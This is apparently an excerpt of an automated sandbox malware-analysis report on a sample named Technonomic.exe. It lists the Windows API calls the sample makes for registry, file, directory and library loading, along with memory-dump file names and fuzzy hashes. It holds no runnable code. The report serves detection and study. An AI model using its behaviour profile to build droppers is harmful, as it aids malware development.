                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                                                                      • Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
                                                                                                                                                                      • Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                                                                      • Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
                                                                                                                                                                      • Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                                                                      • Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19
                                                                                                                                                                      APIs
                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                                                                      • Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
                                                                                                                                                                      • Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                                                                      • Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 849931509-0
                                                                                                                                                                      • Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                                                                      • Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
                                                                                                                                                                      • Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                                                        • Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                                                                        • Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
                                                                                                                                                                        • Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                      • Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                                                                      • Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                                                                      • Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                      • Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                                                                      • Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
                                                                                                                                                                      • Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                      • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                                                      • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                                                      • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                      • Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
                                                                                                                                                                      • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                      • Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405842
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                      • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                                                      • Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
                                                                                                                                                                      • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                                                      • Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D
                                                                                                                                                                      APIs
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                                      • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                                                      • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
